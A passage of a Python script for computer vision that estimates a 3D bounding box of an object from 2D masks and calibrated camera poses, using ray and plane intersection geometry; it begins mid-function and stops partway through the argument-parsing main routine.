intersection point is camera center) just skip\n if len(target_intersection) > 0:\n if np.linalg.norm(c_t - inter_point) <= error_bound:\n break\n target_intersection.append(inter_point.copy())\n '''\n #else:\n # raise Exception(\"computational stability is not good\")\n\n for r in (r, -r):\n r1_r2_cos = dot_product_unit(r_t1, r_t2)\n r_r1_cos = dot_product_unit(r, r_t1)\n r_r2_cos = dot_product_unit(r, r_t2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n inf_point = make_infinite_point_of_ray(r)\n target_intersection.append(inf_point.copy())\n\n # Now, each list has a maximum of 2 points\n assert len(base_intersection) <= 2 and len(target_intersection) <= 2\n \n # Finally, we obtain the intersection of base_intersection and target_intersection\n if len(base_intersection) == 0 or len(target_intersection) == 0:\n # There is no intersection\n return intersection_list\n\n base_intersection = np.hstack(base_intersection)\n target_intersection = np.hstack(target_intersection)\n # Sort ascending by column\n base_intersection = base_intersection[:, base_intersection[0].argsort()]\n target_intersection = target_intersection[:, target_intersection[0].argsort()]\n\n # .. -- or . -- or .. - or . - \n # Below conditions can cover infinite points \n if target_intersection[0][0] > base_intersection[0][-1] \\\n or base_intersection[0][0] > target_intersection[0][-1]:\n # There is no intersection\n return intersection_list\n\n # Now consider intersection is a point\n # -.- or .-. or . == -\n if base_intersection.shape[1] == 1:\n intersection_list.append(base_intersection[:, 0].reshape(3, 1))\n return intersection_list\n if target_intersection.shape[1] == 1:\n intersection_list.append(target_intersection[:, 0].reshape(3, 1))\n return intersection_list\n \n # Finally, consider intersectoin is a line segment or ray\n # len(base_intersection) == 2 and len(target_intersection) == 2\n # -.-. or .--. or -..- or .-.-\n all_intersection = np.hstack([base_intersection, target_intersection])\n all_intersection = all_intersection[:, all_intersection[0].argsort()]\n intersection_list.append(all_intersection[:, 1].reshape(3,1))\n intersection_list.append(all_intersection[:, 2].reshape(3,1))\n \n return intersection_list\n\ndef get_intersection_of_rays_and_bbox(bbox, raydirs, c_t):\n # bbox = xmax, ymax, zmax, xmin, ymin, zmin\n # raydirs = r1, r2\n intersection_list = []\n r1, r2 = raydirs\n\n # We can cut the 3D bbox using intersection of the masks' rays and the 3D bbox\n # It is performed according to the following algorithm:\n # 1) Find the intersection of the two rays and the bbox's faces\n # 1-1) If each ray is perpendicular to the normal vector of plane, there is no intersection\n # (i.e. That is, intersection points are not considered when each ray is on the plane as well as when it is parallel to the plane)\n # 1-2) check λ >= 0 (In fact, the bbox is always in front of all cameras. So we don't need to check it. But.. 
we check it just for safety)\n # 2) Find the intersection of the rays' plane and bbox's edges\n\n # 1)\n for r in raydirs:\n for i in range(r.shape[0]):\n if np.abs(r[i]) <= error_bound:\n # The ray is perpendicular to the i_axis(this is the normal vector of planes which are i = i_max, i = i_min), i = x, y, z\n continue\n else:\n # get λ which satisfies c_t[i] + λ * r[i] = i_max, i_min\n i_max, i_min = bbox[i], bbox[i+3]\n lam_max = (i_max - c_t[i]) / r[i]\n lam_min = (i_min - c_t[i]) / r[i]\n if lam_max >= -error_bound:\n inter_point = c_t + lam_max * r\n if (bbox[((i+1)%3)+3] <= inter_point[(i+1)%3] and inter_point[(i+1)%3] <= bbox[(i+1)%3]) and \\\n (bbox[((i+2)%3)+3] <= inter_point[(i+2)%3] and inter_point[(i+2)%3] <= bbox[(i+2)%3]):\n intersection_list.append(inter_point.copy())\n if lam_min >= -error_bound:\n inter_point = c_t + lam_min * r\n if (bbox[((i+1)%3)+3] <= inter_point[(i+1)%3] and inter_point[(i+1)%3] <= bbox[(i+1)%3]) and \\\n (bbox[((i+2)%3)+3] <= inter_point[(i+2)%3] and inter_point[(i+2)%3] <= bbox[(i+2)%3]):\n intersection_list.append(inter_point.copy())\n # 2)\n # First, consider the rays' plane which constructed by c_t, r1, r2 : dot(n, (x,y,z) - c_t) = 0, n = r1 × r2\n # Next, consider edges of bbox\n # There are 12 edges\n # Each edge has a fixed value for two axes, and bounded values(end points of interval) for the other axis\n # Now, consider an edge with y and z values y0 and z0, and x values from x_min to x_max\n # 1) dot(n, (x,y0,z0) - c_t) = 0 => n_x(x - c_tx) = -n_y(y0 - c_ty) - n_z(z0 - c_tz)\n # 2) If n_x = 0, the edge is on the plane or the edge and the plane are parallel. This does not need to be considered because \n # 2-1) If the edge and rays don't meet, we don't need to cut the bbox\n # 2-2) If the edge and rays meet, this case was considered in 1) already\n # 3) If n_x ≠ 0, the edge and the plane meet at most one point : x0 = (-n_y(y0 - c_ty) - n_z(z0 - c_tz)) / n_x + c_tx\n # 4) Check the point is valid\n # 4-1) x_min <= x0 <= x_max ?\n # 4-2) Is the point in between the two rays?\n n = cross(r1, r2)\n for i in range(n.shape[0]):\n if np.abs(n[i]) <= error_bound:\n continue\n i_min, i_max = bbox[i+3], bbox[i]\n fixed_value_1 = bbox[((i+1)%3) + 3], bbox[(i+1)%3]\n fixed_value_2 = bbox[((i+2)%3) + 3], bbox[(i+2)%3]\n for j in range(2):\n v1 = fixed_value_1[j]\n for k in range(2):\n v2 = fixed_value_2[k]\n # get point of intersection\n inter_point = np.zeros((3,1))\n inter_point[i] = (-n[(i+1)%3] * (v1 - c_t[(i+1)%3]) -n[(i+2)%3] * (v2 - c_t[(i+2)%3])) / n[i] + c_t[i]\n inter_point[(i+1)%3] = v1\n inter_point[(i+2)%3] = v2\n # check validation 4-1)\n if i_min <= inter_point[i] and inter_point[i] <= i_max:\n # check validation 4-2)\n # 1) cos(r, r1) > 0 or cos(r, r2) > 0 (because of FOV < 180 degree)\n # 2) cos(r1, r2) <= cos(r, r1) and cos(r1, r2) <= cos(r, r2)\n r = inter_point - c_t\n r1_r2_cos = dot_product_unit(r1, r2)\n r_r1_cos = dot_product_unit(r, r1)\n r_r2_cos = dot_product_unit(r, r2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n # point of intersection exists on ray plane!\n intersection_list.append(inter_point.copy())\n \n return intersection_list\n\ndef Is_point_in_ray_view(p, ray_pair_list, c):\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. 
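    # (A quick numeric check with made-up vectors: for r1 = (1,0,1) and r2 = (-1,0,1)
    # listed in that order, n = r1 × r2 = (0,-2,0); a point p = (0,-1,1) inside the
    # wedge at camera c = (0,0,0) gives dot(n, c - p) = -2 <= 0, matching the test below.)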
Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the point to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c, a point = p\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c) = 0 => λ = dot(n, c - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n # Since ||n|| ≠ 0, λ <= 0 <=> dot(n, c - p) <= 0\n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n if np.dot(n.T, c - p) > error_bound:\n is_in_ray = False\n break \n return is_in_ray\n\ndef Is_ray_in_ray_view(r, c_t, ray_pair_list, c):\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # Is the target ray r in the base rays's field of view?\n # We just need to check the point, p = c_t + λ' * r, is in the base rays's field of view when λ' = inf\n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the point to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c, a point = p = c_t + λ' * r\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c) = 0 => λ = dot(n, c - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n \n # Now, let's simplify the above process(λ' = inf)\n # λ <= 0 <=> dot(n, c - p) <= 0 <=> dot(n, c - c_t - λ' * r) <= 0 <=> dot(n, c - c_t) - λ' * dot(n, r) <= 0 <=> [dot(n, r) > 0] or [dot(n, r) = 0, dot(n, c - c_t) <= 0] \n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n if np.dot(n.T, r) < -error_bound:\n is_in_ray = False\n break\n elif np.abs(np.dot(n.T, r)) <= error_bound:\n if np.dot(n.T, c - c_t) > error_bound:\n is_in_ray = False\n break\n return is_in_ray\n\ndef get_bbox_corners_in_ray_view(bbox, ray_pair_list, c_t):\n # bbox = xmax, ymax, zmax, xmin, ymin, zmin\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. 
Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the corner of bbox to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c_t, a corner point = p\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c_t) = 0 => λ = dot(n, c_t - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n corner_in_rays_list = []\n corner = np.zeros((3,1))\n for i in range(2):\n for j in range(2):\n for k in range(2):\n corner[0] = bbox[i*3]\n corner[1] = bbox[j*3 + 1]\n corner[2] = bbox[k*3 + 2]\n\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n lam = np.dot(n.T, c_t - corner) / np.square(np.linalg.norm(n))\n if lam > error_bound:\n is_in_ray = False\n break \n if is_in_ray:\n corner_in_rays_list.append(corner.copy())\n \n return corner_in_rays_list\n\ndef make_bbox(masks, cam, extend_ratio, reliable_ratio, use_inf_bbox_to_bounded=False):\n '''\n Robust 3D bounding box generation algorithm with calibrated cameras and 2D bounding boxes\n Assumptions\n 1) A few 2D bounding boxes (masks) are poor, but most masks are reliable\n 1-1) 'poor' includes not only the segmentation quality, but also whether the mask completely contains the object\n Thus, Most images should completely contain the object(i.e. 
the image quality is also included)\n 2) There is an area that all camera views see in common\n 3) Rays(half lines) goes in the positive direction : ray = c + λ * r, λ >= 0\n 4) FOV is less than 180 degree for all cameras\n 5) Camera format should be OpenCV : X_im = K (R @ X_world + t)\n 6) image coordinate : x - right, y - bottom\n All 3D points and direction vectors have (3,1) shape\n Time complexity\n 1) When all views(images) completely contain the object(so, object is not clipped)\n O(n), n = # of views(masks)\n 2) Some views do not fully contain objects(so, object is clipped in some images)\n O(n^2)\n ----------------------------------------------------------------------\n Above versions are not implemented because they can be covered some extent by heuristics : just using `extend_ratio`\n (When the ratio of the cut part is small compared to the overall size of the object)\n 3) We assume that objects in some views are partially clipped\n O(n)\n '''\n\n base_mask = list(masks.keys())[0]\n select_ray = [(\"top_left\",\"top_right\"), (\"top_right\",\"bottom_right\"), (\"bottom_right\",\"bottom_left\"), (\"bottom_left\",\"top_left\")] # clock-wise manner for right-had rule\n \n # compute camera center and ray direction(ray direction for image corner)\n # Let c : camera center, r : ray direction, then equation of ray : c + λ * r, λ >= 0\n cam_center_dict = {}\n ray_direction_dict = {}\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R, t = pose[:3, :3], pose[:3, 3:]\n K = cam[\"intrinsic_\"+str(frame_num)]\n cam_center_dict[mask_name] = -R.T @ t\n # image coordinate : x - right, y - bottom\n y, x = np.where(masks[mask_name])\n ray_direction_dict[mask_name] = {\"top_left\": compute_ray_direction(R, K, y.min(), x.min()), \"top_right\": compute_ray_direction(R, K, y.min(), x.max()),\n \"bottom_left\": compute_ray_direction(R, K, y.max(), x.min()), \"bottom_right\": compute_ray_direction(R, K, y.max(), x.max())}\n \n # Check validation\n # Assumption\n # 1. Rays goes in the positive direction. ray = c + λ * r, λ >= 0\n # 2. FOV is less than 180 degree for all cameras\n # 3. Ignore distortion of cameras\n # We assume 3 then validate 1, 2.\n # How?\n # R.T @ (0,0,1).T : camera center ray ; X_cam = R @ X_world + t => R.T @ λ*(0, 0, 1).T - R.T @ t = X_world => camera center ray = R.T @ (0, 0, 1).T, λ >= 0\n # If dot((unit(camera center ray), unit(r)) <= 0, then 1 or 2 is false (But this can not detect [1 false and 2 false]. We ignore it)\n # This is not a direct measurement of FOV, but it doesn't matter. 
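    # (Hypothetical numbers for this check: with the identity pose the optical-axis ray is
    # (0,0,1), and a corner ray (0.3,-0.2,1.0) gives a unit dot product of about 0.94 > 0,
    # so it passes; a non-positive value would mean a corner ray at 90 degrees or more.)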
This is equivalent\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n cam_center_ray = R.T @ np.array([0, 0, 1]).reshape(3,1)\n for key in ray_direction_dict[mask_name].keys():\n if dot_product_unit(cam_center_ray, ray_direction_dict[mask_name][key]) <= error_bound:\n raise Exception(\"Camera ray doesn't satisfy assumption!\\n\\\n mask_name : {mask_name}, frame_num : {frame_num}\".format(mask_name=mask_name, frame_num=cam[mask_name]))\n \n # get 3D bboxes made by two 2D bbox (base view and each of the other views)\n bbox_3d_each_view_dict = {}\n c_base = cam_center_dict[base_mask] # -R0.T @ t0\n base_raydir_dict = ray_direction_dict[base_mask]\n\n for mask_name in masks.keys():\n if mask_name == base_mask:\n continue\n bbox_3d_each_view_dict[mask_name] = []\n c_t = cam_center_dict[mask_name] # -R.T @ t\n target_raydir_dict = ray_direction_dict[mask_name]\n\n # Compute intersection of two planes(base plane and target plane)\n for base_order in select_ray:\n r_b1 = base_raydir_dict[base_order[0]]\n r_b2 = base_raydir_dict[base_order[1]]\n for target_order in select_ray:\n r_t1 = target_raydir_dict[target_order[0]]\n r_t2 = target_raydir_dict[target_order[1]]\n bbox_3d_each_view_dict[mask_name].extend(get_intersection_of_two_planes((r_b1, r_b2), (r_t1, r_t2), c_base, c_t))\n\n # Check the camera center is in the rays' field of view\n base_ray_pairs = []\n target_ray_pairs = []\n for ray_order in select_ray:\n base_r1 = base_raydir_dict[ray_order[0]]\n base_r2 = base_raydir_dict[ray_order[1]]\n base_ray_pairs.append((base_r1, base_r2))\n t_r1 = target_raydir_dict[ray_order[0]]\n t_r2 = target_raydir_dict[ray_order[1]]\n target_ray_pairs.append((t_r1, t_r2))\n if Is_point_in_ray_view(c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(c_t)\n if Is_point_in_ray_view(c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(c_base)\n\n # Check the target(base) ray is in the base(target) rays' field of view\n # If target(base) ray is in the base(target) rays' field of view, intersection point has infinite value\n for key in target_raydir_dict.keys():\n r = target_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n for key in base_raydir_dict.keys():\n r = base_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n\n # use minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target view are constructed\n # Next, get a 3D bbox, which is the intersection of all above 3D bboxes\n xmax, ymax, zmax = np.inf, np.inf, np.inf\n xmin, ymin, zmin = -np.inf, -np.inf, -np.inf\n for key in bbox_3d_each_view_dict.keys():\n vertex_list = bbox_3d_each_view_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n max_points = np.max(vertices, -1)\n min_points = np.min(vertices, -1)\n \n xmax = max_points[0] if xmax > max_points[0] else xmax\n ymax = max_points[1] if ymax > max_points[1] else ymax\n zmax = max_points[2] if zmax > max_points[2] else zmax\n\n xmin = min_points[0] if xmin < min_points[0] else xmin\n ymin = min_points[1] if ymin < min_points[1] else ymin\n zmin = min_points[2] if zmin < min_points[2] else zmin\n\n # Check validation\n # 
Assumption : There is an area that all camera views see in common\n # Thus, we check _min < _max\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"There should be an area that all camera views see in common\")\n\n # bbox should have bounded size\n # When generating meshes for the train, the bbox should be clear. Therefore, scenes in which bbox has an inf value are excluded for train\n # However, there are some cases when we want to train only the visible part without worrying about the invisible part\n # For such cases, set bbox to force\n bbox = [xmax, ymax, zmax, xmin, ymin, zmin]\n if use_inf_bbox_to_bounded:\n max_value = np.max(np.where(np.abs(bbox) < np.inf, np.abs(bbox), 0))\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n bbox[i] = max_value * np.sign(bbox[i])\n # Exclude bbox which has infinite value\n else:\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n return (None, None, None, None, None, None)\n\n # For clipped object masks\n # reliable_ratio isn't used now\n for i in range(3):\n mid_point = (bbox[i] + bbox[i+3]) / 2.0\n half_dist = (bbox[i] - bbox[i+3]) / 2.0\n bbox[i] = mid_point + extend_ratio * half_dist\n bbox[i+3] = mid_point - extend_ratio * half_dist\n\n return bbox\n\n '''\n For 1) and 2)\n base_mask = list(masks.keys())[0]\n select_ray = [(\"top_left\",\"top_right\"), (\"top_right\",\"bottom_right\"), (\"bottom_right\",\"bottom_left\"), (\"bottom_left\",\"top_left\")] # clock-wise manner for right-had rule\n \n # compute camera center and ray direction(ray direction for image corner)\n # Let c : camera center, r : ray direction, then equation of ray : c + λ * r, λ >= 0\n cam_center_dict = {}\n ray_direction_dict = {}\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R, t = pose[:3, :3], pose[:3, 3:]\n K = cam[\"intrinsic_\"+str(frame_num)]\n cam_center_dict[mask_name] = -R.T @ t\n # image coordinate : x - right, y - bottom\n H, W = masks[mask_name].shape\n ray_direction_dict[mask_name] = {\"top_left\": compute_ray_direction(R, K, 0, 0), \"top_right\": compute_ray_direction(R, K, 0, W),\n \"bottom_left\": compute_ray_direction(R, K, H, 0), \"bottom_right\": compute_ray_direction(R, K, H, W)}\n\n # Check validation\n # Assumption\n # 1. Rays goes in the positive direction. ray = c + λ * r, λ >= 0\n # 2. FOV is less than 180 degree for all cameras\n # 3. Ignore distortion of cameras\n # We assume 3 then validate 1, 2.\n # How?\n # R.T @ t : vector that camera center to origin\n # If dot((unit(R.T @ t), unit(r)) <= 0, then 1 or 2 is false\n # This is not a direct measurement of FOV, but it doesn't matter. This is equivalent\n for mask_name in masks.keys():\n center_to_orient_vec = -cam_center_dict[mask_name]\n for key in ray_direction_dict[mask_name].keys():\n if dot_product_unit(center_to_orient_vec, ray_direction_dict[mask_name][key]) <= error_bound:\n raise Exception(\"Camera ray doesn't satisfy assumption!\\n\\\n mask_name : {mask_name}, frame_num : {frame_num}\".format(mask_name=mask_name, frame_num=cam[mask_name]))\n\n ############################################# First, get 3D boudning box from image corners #############################################\n # Why perform this process? #\n # we can't know which mask is reliable(in automation pipeline). 
So we can't set base mask #\n #########################################################################################################################################\n \n # get 3D bboxes made by two views (base view and each of the other views)\n bbox_3d_each_view_dict = {}\n c_base = cam_center_dict[base_mask] # -R0.T @ t0\n base_raydir_dict = ray_direction_dict[base_mask]\n\n for mask_name in masks.keys():\n if mask_name == base_mask:\n continue\n bbox_3d_each_view_dict[mask_name] = []\n c_t = cam_center_dict[mask_name] # -R.T @ t\n target_raydir_dict = ray_direction_dict[mask_name]\n # Compute intersection of two planes(base plane and target palne)\n for base_order in select_ray:\n r_b1 = base_raydir_dict[base_order[0]]\n r_b2 = base_raydir_dict[base_order[1]]\n for target_order in select_ray:\n r_t1 = target_raydir_dict[target_order[0]]\n r_t2 = target_raydir_dict[target_order[1]]\n bbox_3d_each_view_dict[mask_name].extend(get_intersection_of_two_planes((r_b1, r_b2), (r_t1, r_t2), c_base, c_t))\n\n # Check the camera center is in the rays's field of view\n base_ray_pairs = []\n target_ray_pairs = []\n for ray_order in select_ray:\n base_r1 = base_raydir_dict[ray_order[0]]\n base_r2 = base_raydir_dict[ray_order[1]]\n base_ray_pairs.append((base_r1, base_r2))\n t_r1 = target_raydir_dict[ray_order[0]]\n t_r2 = target_raydir_dict[ray_order[1]]\n target_ray_pairs.append((t_r1, t_r2))\n if Is_point_in_ray_view(c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(c_t)\n if Is_point_in_ray_view(c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(c_base)\n\n # Check the target(base) ray is in the base(target) rays' field of view\n # If target(base) ray is in the base(target) rays' field of view, intersection point has infinite value\n for key in target_raydir_dict.keys():\n r = target_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n for key in base_raydir_dict.keys():\n r = base_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n\n # use minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target view are constructed\n # Next, get a 3D bbox, which is the intersection of all above 3D bboxes\n xmax, ymax, zmax = np.inf, np.inf, np.inf\n xmin, ymin, zmin = -np.inf, -np.inf, -np.inf\n for key in bbox_3d_each_view_dict.keys():\n vertex_list = bbox_3d_each_view_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n max_points = np.max(vertices, -1)\n min_points = np.min(vertices, -1)\n \n xmax = max_points[0] if xmax > max_points[0] else xmax\n ymax = max_points[1] if ymax > max_points[1] else ymax\n zmax = max_points[2] if zmax > max_points[2] else zmax\n\n xmin = min_points[0] if xmin < min_points[0] else xmin\n ymin = min_points[1] if ymin < min_points[1] else ymin\n zmin = min_points[2] if zmin < min_points[2] else zmin\n \n # Check validatoin\n # Assumption : There is an area that all camera views see in common\n # Thus, we check _min < _max\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"There should be an area that all camera views see in common\")\n \n # bbox should have bounded size\n # When generating meshes for the train, the bbox should be clear. 
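    # (Worked example of the clamp described below, with made-up numbers: for
    # bbox = [inf, 2, 3, -1, -2, -3] the largest finite magnitude is 3, so
    # use_inf_bbox_to_bounded replaces xmax = inf with 3 * sign(inf) = 3.)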
Therefore, scenes in which bbox has an inf value are excluded for train\n # However, there are some cases when we want to train only the visible part without worrying about the invisible part\n # For such cases, set bbox to force\n if use_inf_bbox_to_bounded:\n max_value = np.max(np.where(np.abs(bbox) < np.inf, np.abs(bbox), 0))\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n bbox[i] = max_value * np.sign(bbox[i])\n # Exclude bbox which has infinite value\n else:\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n return (None, None, None, None, None, None)\n\n ########################################### Next, modify 3D boudning box from 2D bbox corners ###########################################\n # Cut 3D bbox which is obtaied above using 2D bboxes # \n #########################################################################################################################################\n\n bbox_3d_each_mask_dict = {}\n for mask_name in masks.keys():\n bbox_3d_each_mask_dict[mask_name] = []\n H, W = masks[mask_name].shape\n\n # get 2D bbox\n y, x = np.where(masks[mask_name])\n # get camera center\n c_t = cam_center_dict[mask_name]\n # get camera matrix\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n K = cam[\"intrinsic_\"+str(frame_num)]\n # get rays from 2D bbox corners\n # If an object is clipped from the image, the ray that cuts the object should not cut the bbox \n rays = {}\n if x.min() > 0 and y.min() > 0:\n rays[\"top_left\"] = compute_ray_direction(R, K, y.min(), x.min())\n if x.max() < W - 1 and y.min() > 0:\n rays[\"top_right\"] = compute_ray_direction(R, K, y.min(), x.max())\n if x.max() < W - 1 and y.max() < H - 1:\n rays[\"bottom_right\"] = compute_ray_direction(R, K, y.max(), x.max())\n if x.min() > 0 and y.max() < H - 1:\n rays[\"bottom_left\"] = compute_ray_direction(R, K, y.max(), x.min())\n\n valid_ray_pairs = []\n for ray_order in select_ray:\n if ray_order[0] in rays.keys() and ray_order[1] in rays.keys():\n r1 = rays[ray_order[0]]\n r2 = rays[ray_order[1]]\n valid_ray_pairs.append((r1, r2))\n\n for ray_pair in valid_ray_pairs:\n # get intersection of rays and bbox\n bbox_3d_each_mask_dict[mask_name].extend(get_intersection_of_rays_and_bbox(bbox, ray_pair, c_t))\n \n # To make it clear what will be cut, we add the corners of the bbox within the rays's field of view\n # Use right-hand rule for cross product\n if len(valid_ray_pairs) > 0:\n bbox_3d_each_mask_dict[mask_name].extend(get_bbox_corners_in_ray_view(bbox, valid_ray_pairs, c_t))\n\n # use robust minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target mask are constructed\n # Next, get a 3D bbox, which is the intersection of all the above `reliable` 3D bboxes\n # Let denote r := reliable_ratio, then we ignore the max values of the lower 1-r ratios and the min values of the upper 1-r ratios.\n max_points = None\n min_points = None\n for key in bbox_3d_each_mask_dict.keys():\n vertex_list = bbox_3d_each_mask_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n if max_points is None:\n max_points = np.max(vertices, -1)\n else:\n max_points = np.vstack([max_points, np.max(vertices, -1)])\n if min_points is None:\n min_points = np.min(vertices, -1)\n else:\n min_points = np.vstack([min_points, np.min(vertices, -1)])\n\n max_points = np.sort(max_points, 0)\n min_points = np.sort(min_points, 0)[::-1]\n\n N = len(masks)\n select_num = N - int(N*reliable_ratio)\n 
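    # (Worked example with hypothetical values: N = 10 masks and reliable_ratio = 0.8
    # give select_num = 2, so after sorting, the two tightest per-axis maxima and the
    # two tightest per-axis minima are skipped as unreliable before reading the bbox.)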
if select_num == N:\n raise Exception(\"There is no appropriate 3D bbox\")\n xmax, ymax, zmax = max_points[select_num]\n xmin, ymin, zmin = min_points[select_num]\n \n # Check validatoin\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"Most of masks should be reliable\")\n \n return xmax, ymax, zmax, xmin, ymin, zmin\n '''\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--mask_dir\", required=True, type=str)\n parser.add_argument(\"--camera_dir\", required=True, type=str)\n parser.add_argument(\"--output_dir\", required=True, type=str)\n parser.add_argument(\"--cam_file_type\", required=True, type=str, help=\"txt | npz\")\n parser.add_argument(\"--mask_threshold\", default=0.3, type=float, help=\"a parameter that changes the mask values to binary when mask values are continuous\")\n parser.add_argument(\"--reliable_ratio\", default=1.0, type=float, help=\"rate of reliable masks\")\n parser.add_argument(\"--extend_ratio\", default=1.2, type=float, help=\"1 / extend_ratio = clipped ratio\")\n parser.add_argument(\"--use_inf_bbox_to_bounded\", action=\"store_true\", help=\"Bound the box with the inf value to an appropriate value\")\n args = parser.parse_args()\n\n # get mask and camera\n masks_list = os.listdir(args.mask_dir)\n mask_paths = [os.path.join(args.mask_dir, mask) for mask in masks_list if (\".png\" in mask or \".jpg\" in mask)]\n\n cam_file_type = args.cam_file_type\n cam = {}\n if cam_file_type == \"txt\":\n # txt type : assume camera parameter in txt file and file names of img and cam are same\n for i, mask in enumerate(mask_paths):\n mask_name = mask.split(\"/\")[-1]\n k_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_k.txt\")\n r_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_r.txt\")\n t_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_t.txt\")\n if os.path.isfile(k_path) and os.path.isfile(r_path) and os.path.isfile(t_path):\n K = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_k.txt\"))\n pose = np.eye(4)\n pose[:3, :3] = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_r.txt\"))\n pose[:3, 3] = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_t.txt\")) \n cam[mask_name] = str(i)\n cam[\"pose_\"+str(i)] = pose\n cam[\"intrinsic_\"+str(i)] = K\n elif cam_file_type == \"npz\":\n # npz type : assume there is just one npz file in the camera directory\n # assume cam has (image_file_name, frame num) pair\n cam_org_path = [path for path in os.listdir(args.camera_dir) if \".npz\" in path]\n if len(cam_org_path) != 1:\n raise Exception(\"There should be only one camera file!\")\n cam_org_path = cam_org_path[0]\n cam_org = np.load(os.path.join(args.camera_dir, cam_org_path))\n for mask_path in mask_paths:\n mask_name = mask_path.split(\"/\")[-1]\n image_name = \".\".join(mask_name.split(\".\")[0:2])\n if image_name in cam_org.keys():\n frame_num = str(cam_org[image_name])\n cam[mask_name] = frame_num\n cam[\"pose_\"+frame_num] = cam_org[\"pose_\"+frame_num]\n cam[\"intrinsic_\"+frame_num] = cam_org[\"intrinsic_\"+frame_num] \n 